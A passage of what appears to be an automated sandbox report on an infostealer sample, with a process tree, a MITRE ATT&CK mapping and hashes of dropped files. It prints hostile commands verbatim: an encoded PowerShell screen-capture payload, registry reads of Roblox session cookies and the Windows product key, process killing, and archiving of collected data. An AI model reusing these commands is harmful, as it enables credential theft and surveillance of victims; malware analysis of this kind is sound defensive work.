      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1392
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1808
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3716
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zuvwqh5o\zuvwqh5o.cmdline"
        5⤵
        
        PID:1832
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2BAF.tmp" "c:\Users\Admin\AppData\Local\Temp\zuvwqh5o\CSC4AA81CBE13CF4BF3968C88D5B743C61.TMP"
        6⤵
        
        PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4144
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4748
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3496
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2728
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2052"
    3⤵
    PID:2688
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2052
      4⤵
      Kills process with taskkill
      PID:1276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1872"
    3⤵
    PID:4380
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1872
      4⤵
      Kills process with taskkill
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2052"
    3⤵
    PID:3572
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2052
      4⤵
      Kills process with taskkill
      PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3892"
    3⤵
    PID:5084
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3892
      4⤵
      Kills process with taskkill
      PID:344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1872"
    3⤵
    PID:4708
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1872
      4⤵
      Kills process with taskkill
      PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 420"
    3⤵
    PID:2968
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4748
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 420
      4⤵
      Kills process with taskkill
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3892"
    3⤵
    PID:392
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3892
      4⤵
      Kills process with taskkill
      PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2368"
    3⤵
    PID:404
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2368
      4⤵
      Kills process with taskkill
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 420"
    3⤵
    PID:4456
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 420
      4⤵
      Kills process with taskkill
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2536"
    3⤵
    PID:4256
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2536
      4⤵
      Kills process with taskkill
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2368"
    3⤵
    PID:3960
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2368
      4⤵
      Kills process with taskkill
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2536"
    3⤵
    PID:5024
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2536
      4⤵
      Kills process with taskkill
      PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI5482\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\XgIHs.zip" *"
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\_MEI5482\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI5482\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\XgIHs.zip" *
      4⤵
      Executes dropped EXE
      PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1132
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1832
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=2852,i,2396386049343869435,5384284636664447463,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
1⤵
PID:2536

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4984

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
1⤵
PID:3716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8db69f6122a37dc1e677b3b4a43e4cd2

SHA1
8f3afaa6260895d544bc9c36957dd388ff1bdf4a

SHA256
6b765d2eb9600307ea25c1731e3b3263ede0f6dfc10297b68be70b251a0a71f5

SHA512
574f791caa0edec68f720050a32f259f3c34cb85666ee96982b03c66005d72fdaac0c51ae6ade778caa667931e3f05b5ca2699a2faa1e76106b657cb4b5dde28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\2035.tmp\2036.tmp\2037.bat

Filesize
184KB

MD5
dac3246a897d2448c4b572f5a159cd0d

SHA1
15ff4f8282940fd6e448dcd2a1cb82ba1eab3a13

SHA256
1605c33720463f5d1fa2ca95c4904081df6caf5a26c98dab221244be293cb4bc

SHA512
907c5bab48430b9bfcff63fac115d11bb8db28fda73ed3fc5320f3b90396ef5d3d4dc39cb274c04530cc659329aa05833f668fde5b8c6d783f183346f0fa26ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\REGEBB3.tmp

Filesize
9.9MB

MD5
edd98e3205119522739ea2eaf7f9d180

SHA1
3f20986a69980de510434b1e0378a3f1870fe29c

SHA256
f2a653374eea2e1850957a962830ff6e36ee31bea6c906aa6e9252f4f72f651b

SHA512
6a2e12b3fa7c4ef99057f30b514f50321ba2c27cfc7ffc1bbd63f55243f1ecac0292c5ac41d60359ec8e8a83c85c33647299a3ab265e1d8449ec99937b8f8f33

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2BAF.tmp

Filesize
1KB

MD5
8b2401379d36639910475f5f754b9388

SHA1
7b55610f062d1aca77fdf0ebf07c724ec503e641

SHA256
263f29d6d97b6326e7ce7a118d10b7c94bdc4a8dec7e235895a4f4966ef74cc9

SHA512
f506d8099061290591407db2ef72ef92e04c72e1bb25f87363c0f81ce788923218d91b39b97832af35e8e3d7fd695b6aa3049f7959998be89aa0abb0ad5c6be1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5482\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5482\_bz2.pyd

Filesize
48KB

MD5
c413931b63def8c71374d7826fbf3ab4

SHA1
8b93087be080734db3399dc415cc5c875de857e2

SHA256
17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

SHA512
7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5482\_ctypes.pyd

Filesize
58KB

MD5
00f75daaa7f8a897f2a330e00fad78ac

SHA1
44aec43e5f8f1282989b14c4e3bd238c45d6e334

SHA256
9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

SHA512
f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5482\_hashlib.pyd

Filesize
35KB

MD5
